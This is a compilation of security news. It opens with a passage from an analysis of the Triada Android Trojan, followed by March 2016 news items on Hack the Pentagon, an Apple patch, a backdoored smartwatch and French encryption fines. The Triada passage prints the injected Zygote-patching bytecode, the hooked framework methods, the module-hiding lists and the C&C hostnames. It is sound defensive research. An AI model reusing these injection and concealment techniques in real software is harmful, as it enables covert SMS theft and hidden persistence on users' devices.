The file is divided into 16 blocks;
The first 8 bytes of each block are read;
These 8-byte sequences are compared with the corresponding sequences from the file that loaded in memory;
If the comparison fails, configPPP aborts its execution and returns a 103 error code. If the comparison succeeds, the Trojan starts patching framework.odex in memory.

Then, the malware obtains the Class structure of ActivityThread (which is defined in framework.odex) by using dexFindClass and dexGetClassData functions. The authors of the malware copied these functions from Dalvik Virtual Machine. The structure contains various information about a dex class and is defined in AOSP. Using the structure, Triada iterates through a list of methods implemented in this class looking for a method named “main”. After the method has been found, the Trojan obtains its bytecode with the help of the dexGetCode function (also copied from open sources). When the bytecode is obtained, it is compared with the corresponding bytecode from the file on the disk, thereby checking if the framework has already been patched. If the method has already been patched, the malware aborts its execution and returns a 103 error code.

After that, the Trojan starts looking for the first string in the DEX strings table that are between 32 and 64 symbols long. After a string has been found, the Trojan replaces it with “/system/lib/libconfigpppl.so” and saves its ID.

Next, Triada accesses the DEX methods table and tries to obtain a method with one of the following names – “loop“, “attach” or “setArgV0“. It takes the first one that occurs in the table, or, if there are no methods with these names, the penultimate method from the DEX methods table, and replaces it with a standard System.load() method (one that loads shared libraries to process address space) and saves its ID. The pseudocode that performs this manipulation is shown below.

 

After these actions, the preparatory stage is complete, and the Trojan performs the actual patching. It modifies the memory of the process, adding the following instructions to the bytecode of the “main” method of the ActivityThread class:

1A 00 [strID, 2 bytes] //const-string v0, “/system/lib/libconfigpppl.so”
71 10 [methID, 2 bytes] 00 00 //invoke-static {v0}, Ljava/lang/System;->load(Ljava/lang/String;)V
0E 00 //return-void

where strID is thesaved ID of the replaced string, and methID is the saved ID of the replaced method.

After these modifications, when ActivityThread.main() is called, it will automatically load the shared library “/system/lib/libconfigpppl.so” to the context of the caller process. But because framework.odex is only patched in the context of the Trojan process, the library will only be uploaded in the Trojan process. This seemingly meaningless action is performed in order to test the ability of the malicious program to modify the Zygote process. If the steps described above do not cause errors in the context of the application, they will not cause errors in the context of the system process. Such a complex operation as changing the Zygote address space has been approached very carefully by the attackers, since the slightest error in this process can result in immediate system failure. That is why the “test run” is performed to check the efficiency of the methods on the user’s device.

At the end configPPP() writes the following data to “/data/configppp/cpppimpt.db“:

ID of replaced string (4 bytes);
Content of replaced string (64 bytes);
ID of replaced method (4 bytes);
Pointer to the Method structure for replaced method (4 bytes);
Content of the Method structure for ActivityThread.main() (52 bytes);
Load address of framework.odex (4 bytes);
List of structures that contain (previously used for comparison, 192 bytes):
Pointer to the next block of framework.odex;
First 8 bytes of the block:
Size of framework.odex in memory (before patching) (4 bytes);
Pointer to the DexFile structure for framework.odex (4 bytes);
Content of the DexFile structure for framework.odex (44 bytes);
Pointer to the Method structure for System.load() (4 bytes);
Size of ActivityThread.main() bytecode before patching (4 bytes);
Bytecode of ActivityThread.main() before patching (variable);
Finally, the Trojan calls the patched ActivityThread.main(), thus loading /system/lib/libconfigpppl.so in its address space. We will describe the purpose of this library after explaining the functionality of the configpppi ELF-executable that performs the actual modification of Zygote’s address space.

Modification of the Zygote

In fact, configpppi also patches ActivityThread.main() from framework.odex, but unlike libconfigpppm.so, it receives the PID of a process running on the system as an argument and performs patching in the context of this process. In this case, the Trojan patches the Zygote process. It uses information obtained at the previous stage (in libconfigpppm.so) and stored in /data/configppp/cpppimpt.db to modify the Zygote process via ptrace system­­­­­ calls.

The Zygote process is a daemon whose purpose is to launch Android applications. It receives requests to launch an application through /dev/socket/zygote. Every launch request triggers a fork() call. When fork() occurs the system creates a clone of the process – a child process that is a full copy of a parent. Zygote contains all the necessary system libraries and frameworks, so every new Android application will receive everything it needs to execute. This means every application is a child of the Zygote process and after patching, every new application will receive framework.odex modified by the Trojan (with libconfigpppl.so injected). In other words, libconfigpppl.so ends up in all new apps and can modify how they work. This opens up a wide range of opportunities for the cybercriminals.

Substitution of standard Android Framework features

When the shared library /system/lib/libconfigpppl.so is loaded inside the Zygote by System.load(), the system invokes its JNI_OnLoad() function. First, the Trojan restores the string and method replaced earlier by /system/lib/libconfigpppm.so or configpppi, using the information from /data/configppp/cpppimpt.db. Second, Triada loads the DEX file configpppl.jar. This is done with the help of a standard Android API via dalvik.system.DexClassLoader.

 

To ensure that DEX is successfully loaded, the Trojan calls its method pppMain from the PPPMain class. This method only outputs to logcat string “PPP main started”.

 

The next stage is to prepare hooks for some methods from Android Framework (framework.odex). The malware checks if everything necessary for hook methods exist in configpppl.jar (it uses the internal checkPackageMethodExits() method for this). The Trojan then prepares hooks for the following methods:

java.lang.System.getProperty()
android.app.Instrumentation.newApplication()
com.android.internal.telephony.SMSDispatcher.dispatchPdus()
android.app.ActivityManager.getRunningServices()
android.app.ActivityManager.getRunningAppProcesses()
android.app.ApplicationPackageManager.getInstalledPackages()
android.app.ApplicationPackageManager.getInstalledApplications()
The hooks are placed using the standard RegisterNatives() function. This function is designed to perform binding Java methods with their native implementation (i.e. written with C/C++). Thus, the Trojan substitutes standard methods from Android Framework with methods implemented in libconfigpppl.so.

Verifying the success of a Zygote modification

The function which substitutes the original getProperty() first checks its argument. If the argument is the “pp.pp.pp” string (which was mentioned earlier), then the function immediately returns “true”. Otherwise, it calls the original getProperty() with its passed argument. Calling the hooked getProperty() with “pp.pp.pp” as an argument is used to check whether or not hooking of Android Framework functions was successful. If the hooked getProperty() returned “true”, then the Trojan will start configpppi ELF with the PID of the Zygote process as an argument.

After that, the the Trojan “kills” processes of the applications: “com.android.phone”, “com.android.settings”, “com.android.mms”. These are the standard “Phone”, “Settings” and “Messaging” – applications that are the Trojan’s primary targets. The system starts these apps automatically the next time the device is unblocked. After they start they will contain framework.odex with all the hooks placed by libconfigpppl.so.

Modification of outgoing text messages

The function which substitutes newApplication(), first calls the original function, and then invokes two functions from configpppl.jar: onModuleCreate() and onModuleInit().

The function onModuleCreate() checks in the context of the application it is running and then sets the global variable mMainAppType according to the results of checking:

If function is running within com.android.phone, then mMainAppType set to 1;
If function is running within com.android.settings or com.android.mms, then mMainAppType set to 2;
If function is running within one of these apps: com.android.system.google.server.info, com.android.system.guardianship.info.server, com.android.sys.op, com.android.system.op., com.android.system.kylin., com.android.kylines, com.android.email, com.android.contacts, android.process.media, com.android.launcher, com.android.browser, then mMainAppType set to -1;
If function is running within any other application, then mMainAppType set to 0;
Depending on the value of mMainAppType, the function onModuleInit() calls one of the initialization routines:

 

Thus, the Trojan tracks its host application and changes its behavior accordingly. For example, if mMainAppType is set to -1 (i.e. the host application is com.android.email, com.android.contacts etc.), the Trojan does nothing.

If the host application is com.android.phone, Triada registers broadcast receivers for the intents with actions com.ops.sms.core.broadcast.request.status and com.ops.sms.core.broadcast.back.open.gprs.network. It first sets the global variable mLastSmsShieldStatusTime to the current date and time, then turns on mobile network data (GPRS Internet).

If the host application is com.android.settings or com.android.mms, Triada registers broadcast receivers for the intents with the following actions:

com.ops.sms.core.broadcast.request.status;
com.ops.sms.core.broadcast.back.open.gprs.network;
com.ops.sms.core.broadcast.back.send.sms.address.
The first two are the same as in the previous case, and the third sends an SMS, which is passed off as extra intent data.

If the host application is any other app (apart from apps that trigger mMainAppType = -1), then Triada first checks whether or not the application uses the shared library libsmsiap.so:

 

Depending on the result, it calls one of the following functions: PISmsCore.invokeMMMain() or PISmsCore.invokeOtherMain().

Both functions invoke the PISmsCore.initInstance() method which performs the following actions:

Initialization of the Trojan’s global variables with various information about the infected device (IMEI, IMSI etc.);
Substitution of the system binders “isms” and “isms2”, which are used by the parent application along with its own ones;
 

 

Creation of multiple directories /sdcard/Android/com/register/, used for write log and configuration files;
Registration of broadcast receivers for intents with the actions com.ops.sms.core.broadcast.responce.shield.status and com.ops.sms.core.broadcast.responce.sms.send.status, which simply set the corresponding variables to record the time of an event;
If a function is invoked from PISmsCore.invokeMMMain(), then a new thread is created. This thread enters an endless loop and turns on mobile network data, and won’t let the user turn it off.
The most interesting action among the above is the substitution of the system binders “isms” and “isms2”.

Binder is an Android-specific inter-process communication mechanism, and remote method invocation system. All communication between client and server applications within Binder pass through a special Linux device driver – /dev/binder. The scheme of inter-process communication via the Binder mechanism is presented below.

 

For example, when an application wants to send an SMS it calls the sendTextMessage (or sendMultipartTextMessage) function, which in fact leads to the transact() method of an “isms” (or “isms2”) binder object being called.

The transact() method is redefined in the malicious “isms” binder realization, replacing the original. So, when the parent application of the Trojan sends an SMS it leads to the call of the malicious transact() method.

In this method, the Trojan obtains SMS data (destination number, message text, service center number) from raw PDU. Then, if a network connection is available, it sends this data to a random C&C server from the following list:

bridgeph2.zgxuanhao.com:8088
bridgeph3.zgxuanhao.com:8088
bridgeph3.zgxuanhao.com:8088
bridgeph4.zgxuanhao.com:8088
bridgeph2.viewvogue.com:8088
bridgeph3.viewvogue.com:8088
bridgeph3.viewvogue.com:8088
bridgeph4.viewvogue.com:8088
The C&C server should respond with some data that, among other things, contains a new SMS destination address (number) and new SMS text.

If a network connection is not available, then the Trojan tries to find the appropriate data in the local configuration files that are stored in the /sdcard/Android/com/register/localuseinfo/ directory in encrypted form.

The Trojan then replaces the SMS destination address and the SMS text of the original message (obtained from C&C or local configuration files), and tries to send it in three different ways (simultaneously):

Via the standard Android API function sendTextMessage. It will lead to the same malicious transact() method of the Trojan “isms” binder realization;
By sending an intent with the action “com.ops.sms.core.broadcast.back.send.sms.address”. It will be received and processed by the same Trojan module but inside the “Messaging” or “Settings” application;
By passing the new SMS destination address and new SMS text to the original “isms” binder transact() method.
When the Trojan sends an SMS in one of these ways, it saves the new SMS destination address and new SMS text in a special variable. And, before sending the new SMS, it checks if it has not already been sent. This helps to prevent endless recursive calls of the transact() method, meaning only one SMS will be sent per originally sent message (by the parent application).

Besides the PISmsCore.initInstance() function, PISmsCore.invokeMMMain() calls another function – PIMMCrack.initInstance(). This method tries to determine which version of mm.sms.purchasesdk the host application is using (the Trojan knows for sure that the host application is using this SDK, because it has checked for libsmsiap.so, which is part of this SDK). mm.sms.purchasesdk is the SDK of Chinese origin – it is used by app developers for enabling In-App purchasing via SMS.

 

Thus, the mechanism described in this chapter allows the Trojan to modify outgoing SMS messages that are sent by other applications. We presume that the Trojan authors use this opportunity to secretly steal users’ money. For example, when a user buys something in some Android game shop, and if this game uses SDK for in-app purchases via SMS (such as mm.sms.purchasesdk), the Trojan’s authors are likely to modify the outgoing SMS so as to receive the user’s money instead of the game developers. The user doesn’t notice that his money has been stolen; instead he presumes he hasn’t received the appropriate content and will then complain to the game developers.

Filtration of incoming text messages

The original dispatchPdus() is used (as shown in the diagram below) to dispatch PDUs (Protocol Data Unit, low-level data entity used in many communication protocols) of incoming SMS messages to the corresponding broadcast intent. Then, all applications that subscribed for the intent are able to receive and process, according to their needs, the text message that is contained in the form of PDUs inside of this intent.

The function which substitutes dispatchPdus() invokes the moduleDispatchPdus() method from configpppl.jar. It checks the host application and if the application is not com.android.phone, it informs and broadcasts to all apps in the system intent with the action android.provider.Telephony.SMS_RECEIVED (along with the received PDUs). This standard intent informs all other applications (e.g. “Messaging” or “Hangouts” of the incoming SMS).

If the host for the malware is com.android.phone, then Triada checks the originating address and message body of the incoming SMS. The information that the Trojan needs to check is contained within two directories: /sdcard/Android/com/register/infowaitreceive/ and /sdcard/Android/com/register/historyInfo/. The names of the files that are stored in these directories contain postfix, which signifies the date and time of the last response from the C&C. If these files were updated earlier than the last response was received, the Trojan deletes these files and aborts the checking of the incoming SMS. Otherwise, the malware decrypts all the files from the directories mentioned above and extracts phone numbers and keywords from them to perform filtering. If the SMS was received from one of these numbers or the message contains at least one keyword, the Trojan broadcasts an intent with the action android.provider.Telephony.SMS_RECEIVEDcom.android.sms.core along with the message. This is an intent with a custom action and only those applications that explicitly subscribe to this intent, will receive it. There are no such applications on “clean” Android devices. In addition, this method could be used to organize “exclusive” message distribution for Triada modules. If some of the new modules subscribe to the intent with the action android.provider.Telephony.SMS_RECEIVEDcom.android.sms.core, they will receive the filtered message exclusively, without any other applications on the system knowing about it.

Concealing Trojan modules from the list of running services

This function is used to obtain a list of all running services. The Trojan substitutes the function to hide its modules from this list. The following modules will be excluded from the list received from the original getRunningServices():

com.android.system.google.server.info
com.android.system.guardianship.info.server
com.android.sys.op
com.android.system.op.
com.android.system.kylin.
com.android.kylines.
Concealing Trojan modules from the list of running applications

This function is used to obtain a list of all running applications. The Trojan substitutes the function to hide its modules from this list. The following modules will be excluded from the list received from the original getRunningAppProcesses():

com.android.system.google.server.info
com.android.system.guardianship.info.server
com.android.sys.op
com.android.system.op.
com.android.system.kylin.
com.android.kylines.
Concealing Trojan modules from the list of installed packages

This function is used to obtain a list of all installed packages for applications. The Trojan substitutes the function to hide its modules from this list. The following modules will be excluded from the list received from the original getInstalledPackages():

com.android.system.google.server.info
com.android.system.guardianship.info.server
com.android.sys.op
com.android.system.op.
com.android.system.kylin.
com.android.kylines.
Concealing Trojan modules from the list of installed applications

This function is used to obtain a list of all installed packages for applications. The Trojan substitutes the function to hide its modules from this list. The following modules will be excluded from the list received from the original getInstalledPackages():

com.android.system.google.server.info
com.android.system.guardianship.info.server
com.android.sys.op
com.android.system.op.
com.android.system.kylin.
com.android.kylines.
Conclusion

Applications that gain root access to a mobile device without the user’s knowledge can provide access to much more advanced and dangerous malware, in particular, to Triada, the most sophisticated mobile Trojans we know. Once Triada is on a device, it penetrates almost all the running processes, and continues to exist in the memory only. In addition, all separately running Trojan processes are hidden from the user and other applications. As a result, it is extremely difficult for both the user and antivirus solutions to detect and remove the Trojan.

The main function of the Trojan is to redirect financial SMS transactions when the user makes online payments to buy additional content in legitimate apps. The money goes to the attackers rather than to the software developer. Depending on whether or not the user gets the content he pays for, the Trojan either steals the money from the user (if the user does not receive the content) or from the legitimate software developers (if the user receives the content).

Triada has clearly been designed by cybercriminals who know the targeted mobile platform very well. The range of techniques used by the Trojan is not found in any other known mobile malware. The methods of concealing and achieving persistence used by Triada can effectively avoid detection and removal of all malware components after installation on the infected device; the modular architecture allows attackers to extend and alter the functionality so they are limited only by the capabilities of the operating system and applications installed on the device. Since the malware penetrates all applications installed on the system, the cybercriminals can potentially modify their logic to implement new attack vectors against users and maximize their profits.

Triada is as complex as any malware for Windows, which marks a kind of Rubicon in the evolution of threats targeting Android. Whereas previously, the majority of Trojans for the platform were relatively primitive, new threats with a high level of technical complexity have now come to the fore.


Hacknout Pentagon a dostat zaplaceno? Vojáci spouští bug bounty program

3.3.2016 Hacking

Nápady ze Silicon Valley má v rámci amerického ministerstva obrany prosazovat Eric Schmidt.
Ačkoliv plno technologií vzniká napřed pro armádu a pak se teprve dostane do běžného prodeje, v digitálním světě je situace přinejmenším vyrovnaná. Americká armáda chce posílit především v bezpečnosti. Kyberprostor je už prostě dalším bojištěm.

Eric Schmidt se stal hlavou nové pracovní skupiny s názvem Defense Innovation Advisory Board. Ta by měla pomoci Pentagonu vstřebat a nasát nápady ze Silicon Valley. Americká vláda tak zkouší to, o co se poslední dobou snaží i korporace.

Tento týden rozjely úřady vlastní bug bounty program s názvem Hack the Pentagon. V jeho rámci bude platit hackerům za objevení bezpečnostních děr v systémech ministerstva obrany. Kromě toho se často snaží naverbovat hackery, kteří by posílili jednotky pro boj v kyberprostoru.

TIP: Facebook loni hledačům chyb vyplatil skoro milion dolarů

Tím to jen začíná. Schmidtův jedenáctičlenný tým by měl podle informací CNN hledat problémy, se kterými se Pentagon potýká při používání technologií a přinášet rychlá řešení. Zároveň ale nebude mít přístup k vojenským datům.

Schmidt má s vládou dlouholeté zkušenosti. A ne zrovna pozitivní. V zásadě mu vadí, jak moc chtějí úřady strkat nos do databází firem ze Silicon Valley. Je dlouhodobým odpůrcem státního sběru dat a naposledy se připojil k Applu v kauze zablokovaného mobilu střelce ze San Bernardina.


Apple vydal záplatu záplaty. Po aktualizaci lidem přestal fungovat internet

3.3.2016 Zranitelnosti
Bezpečnostní experti uživatelům neustále radí, jak je důležité mít aktualizovaný operační systém, aby se do něj přes nalezené trhliny nedostali žádní nezvaní návštěvníci. Jenže všechny aktualizace se ne vždy povedou, jak se na vlastní kůži v minulých dnech přesvědčili uživatelé počítačů od Applu. Bezpečnostní záplata jim totiž zablokovala internetové připojení.
Problém se týkal uživatelů, kteří používají operační systém OS X El Capitan. Sluší se zmínit, že právě na této verzi funguje drtivá většina notebooků a stolních počítačů od amerického počítačového gigantu. Ten totiž vždy nejnovější verzi systémů nabízí uživatelům jako bezplatnou aktualizaci.

Na minulý týden byla pro El Capitana vydána bezpečnostní záplata, která opravovala chybu týkající se samotného jádra systému. Tu mohli kybernetičtí zločinci zneužít k propašování prakticky libovolného viru na napadený počítač, nebo jej na dálku klidně i ovládnout.

Oprava vyšla během pár dní
S instalací aktualizace tak většina uživatelů z pochopitelných důvodů neotálela. Problém však nastal po instalaci, přestalo totiž fungovat připojení k internetu prostřednictvím ethernetové zástrčky (klasického síťového rozhraní), upozornil server Security Week.

Programátoři amerického počítačového gigantu proto neváhali a během pár dní vydali záplatu záplaty. „Společnost Apple o víkendu vydala opravu bezpečnostní záplaty pro systém OS X El Capitan,“ uvedl bezpečnostní analytik Pavel Bašta z týmu Národního bezpečnostního týmu CSIRT.

Podle něj po instalaci nejnovější aktualizace začne internetové připojení opět fungovat.


Eset expanduje v západní Evropě, otevírá pobočku ve Velké Británii

3.3.2016 Zabezpečení
Během pěti let chce Eset zdvojnásobit lokální tým a výhledově se dostat mezi tři největší prodejce bezpečnostních řešení pro IT ve Velké Británii.

Otevření vlastní obchodní a distribuční pobočky ve Velké Británii navazuje na dlouholetou spolupráci s partnerskou společností DESlock. Společnost Eset provedla akvizici tohoto dodavatele šifrovacích řešení v roce 2015 a rozšířila tak své technologické portfolio.

„Věříme, že spojení lokálního týmu Eset UK s našimi globálními schopnostmi, know-how a zkušenostmi vytvoří dokonalou kombinaci, díky které posílíme naši pozici na britském trhu,“ říká Richard Marko, generální ředitel společnosti Eset. Dodavatel bezpečnostních řešení působí ve Velké Británii prostřednictvím partnerské společnosti DESlock přes deset let.

Pobočku Eset UK se sídlem v Bournemouthu na jihu Anglie povede obchodní a marketingový ředitel společnosti Eset pro region EMEA Miroslav Mikuš. Všichni zaměstnanci bývalého exkluzivního partnera se stávají zaměstnanci společnosti Eset. Ta očekává, že během následujících pěti let by se měl její tým ve Velké Británii přinejmenším zdvojnásobit.

„S týmem ve Velké Británii jsme zejména v posledních letech velmi úzce spolupracovali a velice nás těší, že můžeme tuto spolupráci posunout ještě dále, aby se značka bezpečnostních řešení od společnosti Eset stala atraktivnější jak pro domácnosti, tak pro firmy a běžné uživatele. Výhledově bychom se chtěli dostat mezi tři největší prodejce bezpečnostních řešení pro IT ve Velké Británii,“ říká Mikuš.

„Během prvního roku existence nové pobočky se zaměříme na rozšíření týmu, co nejkvalitnější technologickou podporu a komunikaci s prodejci, abychom v dlouhodobém horizontu optimalizovali naši partnerskou síť ve Velké Británii,” dodává Mikuš.

Vznik samostatné pobočky ve Velké Británii je součástí dlouhodobé strategie společnosti. Jejím cílem je posilovat pozici na tomto nejdůležitějším trhu s bezpečnostními řešeními pro IT v rámci regionu EMEA, aby si v prodejích i nadále udržela dvouciferný meziroční růst.

V Evropské unii provozuje Eset již osm poboček a výzkumných a vývojových center. Otevření britské pobočky následuje po zřízení zastoupení společnosti Eset v Německu, ke kterému došlo v roce 2013.


Hack the Pentagon — US Government Challenges Hackers to Break its Security
3.3.2016 Hacking
The United States Department of Defense (DoD) has the plan to boost their internal and network security by announcing what it calls "the first cyber Bug Bounty Program in the history of the federal government," officially inviting hackers to take up the challenge.
Dubbed "Hack the Pentagon," the bug bounty program invites the hackers and security researchers only from the United States to target its networks as well as the public faced websites which are registered under DoD.
The bug bounty program will begin in April 2016, and the participants could win money (cash rewards) as well as recognition for their work, DoD says.
While announcing 'Hack the Pentagon' initiative during a conference, DoD said only "Vetted Hackers" can participate in the Bug Bounty program, which means the candidates need to undergo a Background Check after registration and before finding vulnerabilities in its systems.
Moreover, candidates would be given a Predetermined Department Systems (might be real system alike) for a specific time period of the competition to access it.
So, don’t be confuse that the DoD will serve a critical piece of its infrastructure to hackers for disruption, rather the hackers will be allowed to target a predetermined system that is not part of its critical operations.
However, the Department of Defense has not yet confirmed what bounty would be provided to hackers upon a successful penetration of its network or web pages.
Why DoD launches a Bug Bounty program?
Department of Defence currently manages 488 websites related to everything from the 111th Attack Wing, several military units to Yellow Ribbon Reintegration Program.
According to Chris Lynch, Director of Defense Digital Service that’s actually behind the "Hack the Pentagon" initiative:
"Bringing in the best talent, technology and processes from the private sector not only helps us deliver comprehensive, more secure solutions to the DoD, but it also helps us better protect our country."
But, Here's the Actual Reason You Need to Know:
The hackers, foreign and internal criminals, are actively targeting government departments and critical infrastructure that could reveal national secrets.
Last year’s massive security breach in the United States Office of Personnel Management (OPM) revealed the private information of over 21.5 Million US government employees.
Just last month, an unknown hacker released personal details of at least 20,000 Federal Bureau of Investigation (FBI) agents and 9,000 Department of Homeland Security (DHS) officers.
Almost three years ago, the Pentagon said the Chinese government had conducted cyber attacks on the several United States diplomatic, economic as well as defense industry networks.
Therefore, the real purpose of launching dedicated bug bounty program for hackers could be a government initiative to identify vulnerabilities in its infrastructure that may expose any endangered state secrets.
Just like Bug Bounty programs offered by several Frontliners in the technology industry, Hack The Pentagon would also be an exercise for the federal authorities to boost up the security measures and counter the cyber attacks.
Instead of usual self-conducting Security Audit by the DoD internals itself, the new initiative would provide an opportunity for the fresh brains outside the Pentagon to challenge DoD infrastructure and enhance the security measures.


$17 smartwatch includes a backdoor in the pairing app
3.3.2016 Safety

A group of researchers that analyzed security of a number of smart watches discovered a $17 smartwatch is sold with a backdoor in the pairing app.
Be careful of cheap smartwatch offered on the web, security researchers at Mobile Iron have found that the U8 Smartwatch available on eBay for sale is offered with an Android or iOS app that contains a backdoor that is linked to a Chinese IP address.

The discovery was presented at the BSides San Francisco conference and of course, the wearable device represents a serious threat to the users’ privacy.

The U8 smartwatch is offered on eBay for 15,99 Euro (just US$17), the buyers download the pairing app from an IP address reported on a piece of paper that comes with the device.

The smartwatch has 1.48″ touch screen and Bluetooth connectivity to mobile devices to control calls by using an Android app that can access the user’s contacts, call and SMS histories.

Mobile Iron research director Michael Raggo told the BSides San Francisco conference the watch is a threat to individual and enterprise security.

Smartwartch threat

The U8 Smartwatch is only one of the list of devices analyzed by Raggo and his colleagues, including the Apple Watch running the WatchOS, the Samsung Gear 2 running Samsung Tizen, and the Moto 360.

U8 Smartwatch

“We ran dynamic and behavioural analysis (on the pairing app) and discovered that when it was paired, it started communicating outbound over a random IP address to China,” explained the Mobile Iron research director Michael Raggo (@datahiding)

“We don’t know what the IP address is. “In terms of corporate espionage, in terms of risk, there’s definitely a lot of suspicious behaviours there.”

Raggo has developed a Python tool called SWATtack tool that could be used for forensics analysis and vulnerability assessment on the smartwatches. The tool is also able to bypass PIN protection implemented on Samsung Gear 2 Neo watches and exfiltrate data.


Can Scientists 'Upload Knowledge' Directly into your Brain to Teach New Skills?
3.3.2016 Safety
Imagine the world where you do not have to make any efforts to learn new skills or knowledge.
Just like new programs are uploaded to a Robot to teach them new skills, What if new skills are uploaded to your brain to make you learn, say, playing Guitar, a whole language like French or German or anything else you wish?
Do you want a technique, if exists, to make this possible?
Of course, YES! Who would not?
Now, multiple media channels are reporting that a team of researchers from HRL Laboratories in California has developed a new technology that could be used to feed any skill into the human brain without much effort.
But, Is it possible in reality?
Let's have a look at what media is reporting and what scientists have actually discovered.
Here's what Media is Reporting:
Media is reporting that researchers have found a way to "upload knowledge to your brain." Researchers claimed to have developed a simulator that can feed data directly into a human’s brain to teach new skills in a shorter amount of time.
Some are reporting that the technique is similar to that seen in 'The Matrix,' in which Keanu Reeves learns 'Kung-Fu' soon after a program is uploaded directly into his brain through a terminal.
Here's what Scientists have Actually Discovered:
In reality, the recent research shows that it may be possible to enhance a human's existing ability to learn new skills, but to upload any particular skill or talent directly into a person via brain waves is outside the scope of the study.
What Did the Scientists Actually Achieve?
Lead by Matthew Phillips, the HRL Labs research team that does R&D for the Boeing Company and General Motors has made use of a neuro-stimulation technique called transcranial Direct Current Stimulation (tDCS) – a noninvasive, painless shock that makes use of a constant, small electric current to excite specific brain regions.
Using tDCS technique, the researchers excited certain areas in the human brain that are responsible for learning and skill retention.
"When you learn something, your brain physically changes," Philips said. "Connections are made and strengthened in a process called neuroplasticity. It turns out that certain functions of the brain, like speech and memory, are located in very specific regions of the brain, about the size of your pinky."
During their experiment, the researchers first monitored the brain waves of 6 commercial as well as military pilots and then transmitted those patterns into 32 newbies who were learning to pilot an aeroplane in a flight simulator.
The finding suggests that tDCS technique might work to enhance a person's ability to learn, as the newbies who received tDCS brain stimulation were found with improved piloting abilities, especially landing skills.
However, this definitely does not mean that the researchers uploaded or transmitted any particular skill or type of data via this technique, rather they just excited the specific brain regions responsible for learning, so that a person could improve his/her learning ability.
So, don’t think that using this new technique you could "upload" an entire skill set, like Kung-Fu or French language. For now, you have to make efforts to learn them but, who knows, the study could just be a first step towards this whole new FUTURE.
For in-depth knowledge, you can read the full research paper published in the journal Frontiers in Human Neuroscience.


Turing Award — Inventors of Modern Cryptography Win $1 Million Cash Prize
3.3.2016 Safety
And the Winners of this year's Turing Award are: Whitfield Diffie and Martin E. Hellman.
The former chief security officer at Sun Microsystems Whitfield Diffie and the professor at Stanford University Martin E. Hellman won the 2015 ACM Turing Award, which is frequently described as the "Nobel Prize of Computing".
Turing Award named after Alan M. Turing, the British mathematician and computer scientist who was a key contributor to the Allied cryptanalysis of the German Enigma cipher and the German "Tunny" encoding machine in World War II.
The Association for Computing Machinery (ACM) announced the Turing Award the same day when FBI Director James Comey appeared before a congressional committee to discuss how encryption has become Threat to law enforcement.
The ACM announced the award on Tuesday, which includes the top prize of $1 Million that has been awarded to two men who invented the "public-key cryptography" – a technique that makes possible the commercial World Wide Web.
"Today, the subject of encryption dominates the media, is viewed as a matter of national security, impacts government-private sector relations, and attracts billions of dollars in research and development," ACM President Alexander Wolf said in a statement.
"In 1976, Diffie and Hellman imagined a future where people would regularly communicate through electronic networks and be vulnerable to having their communications stolen or altered. Now, after nearly 40 years, we see that their forecasts were remarkably prescient."
Diffie and Hellman published their landmark paper titled, New Directions in Cryptography [PDF] in 1976, outlining the first public-key cryptography (or asymmetric cryptography) technique to allow people to encrypt their data using publicly exchanged keys and decrypt the data using their secret private keys.
The technique led to a revolution in the encryption, and the Diffie-Hellman key exchange protocol became central to almost all modern cryptography, including PGP (Pretty Good Privacy) encrypted e-mail, TLS (Transport Layer Security), and more.
What is Diffie-Hellman Public-key Cryptography?
Public-key cryptography is a method of encrypting data in which each party has a pair of keys – one is a freely shareable public key, and the other is a secret private key – thus eliminating the historical key management issue.
The historical method required both sender and recipient of an encrypted message had to use the same key. So in case, that key was stolen or compromised, every encrypted message sent could be read using the key.
"Naturally I'm thrilled by this by this award, but thrilled for cryptography," Diffie said. "It's the third time the Turing award has been given to cryptographers. The fact that it is so central to the field is amazing."
And Hellman said, "The award is a great honor, but I feel very proud because it was named after Alan Turing, a man who was persecuted as we were."
The two inventors of modern cryptography will share the prize money of $1 Million. Though the ACM has just announced the award at the RSA 2016 conference, it will present the 2015 Turing Award at its annual Awards Banquet on June 11, 2016, in San Francisco, California.


France could Fine Apple $1 Million for each iPhone it Refuses to Unlock
3.3.2016 Apple
The United States is not the only one where Apple is battling with the federal authorities over iPhone encryption. Apple could face $1 Million in Fine each time the company refused to unlock an iPhone in France.
Despite its victory in a New York court yesterday, Apple may not be so successful elsewhere in fighting against federal authorities over iPhone encryption battle.
Yann Galut, a member of France’s Socialist Party, has submitted an amendment to a bill aimed at strengthening the French government’s ability to fight against terrorism — by arguing that…
Apple should pay a Million Euro ($1.08 Million) fine for every iPhone Apple refuses to unlock when asked to by law enforcement, The Local reported.
The same €1 Million penalty could apply to Google as well under similar conditions, forcing the tech companies to help its investigators extract data from a suspect’s smartphone in terrorism cases.
The French police seized eight smartphones last year in terror investigations, but the authorities were unable to access them. With Apple and other tech companies unwilling to help the authorities, France wants to enforce new laws to force tech companies to comply with orders.
"We are faced with a legal vacuum when it comes to data encryption, and it’s blocking judicial investigations," Galut told Le Parisien.
"Only money will force these extremely powerful companies like Apple and Google to comply. They are hiding behind a supposed privacy protection, but they’re quick to make commercial use of personal data that they’re collecting."
Apple continues to battle against the Federal Bureau of Investigation (FBI) over a court order to help the agency unlock an iPhone 5C belonging to San Bernardino shooter Syed Farook.
Other Silicon Valley giants, including Google, Facebook, WhatsApp and Twitter, defended Apple CEO Tim Cook’s stance against the FBI in the controversial San Bernardino case and the need for strong protections built into smartphone devices.
Although it remains to be seen whether this proposed law will be approved, how the San Bernardino case is resolved in the United States will definitely impact how other countries might approach the tech giants.


French Gov could fine Apple and Google €1m unless they hack mobile devices
3.3.2016 Apple

French Gov is thinking a law that would impose fines of €1 million on Apple and Google if they refused providing access users’data.
Governments worldwide continue to intensify their pressure on the IT giants requesting the access to users’ data in the name of security.

The US Government wants Apple unlock its mobile devices to access data, the Brazilian Government arrested the Facebook Latin America VP because the company refused to provide access to WhatsApp data to law enforcement in drug trafficking investigation.

The United States is not the only one where Apple is battling with the federal authorities over iPhone encryption.The last Government in order of time that is threatening IT giants is the French one, according to The Local website, Apple in fact could face $1 Million in fine each time it refused to unlock an iPhone in France.

French Gov iphones Sand Bernardino shooter case

The same penalty could apply to Google if the company refuses to give access users’ data to the French authorities.
A member of French Socialist Party, Yann Galut, has submitted an amendment to a bill aimed at strengthening the French government’s ability to fight against terrorism.

“On Monday, French Socialist MP Yann Galut proposed an amendment to French law that – if passed – would see the US companies punished if they didn’t give French officials backdoor access to terrorists’ phones. ” states The Local website

“Galut said on Monday that companies like Apple and Google should be fined up to €1 million when they didn’t cooperate in such cases. “

“We are faced with a legal vacuum when it comes to data encryption, and it’s blocking judicial investigations,” Galut told Le Parisien.

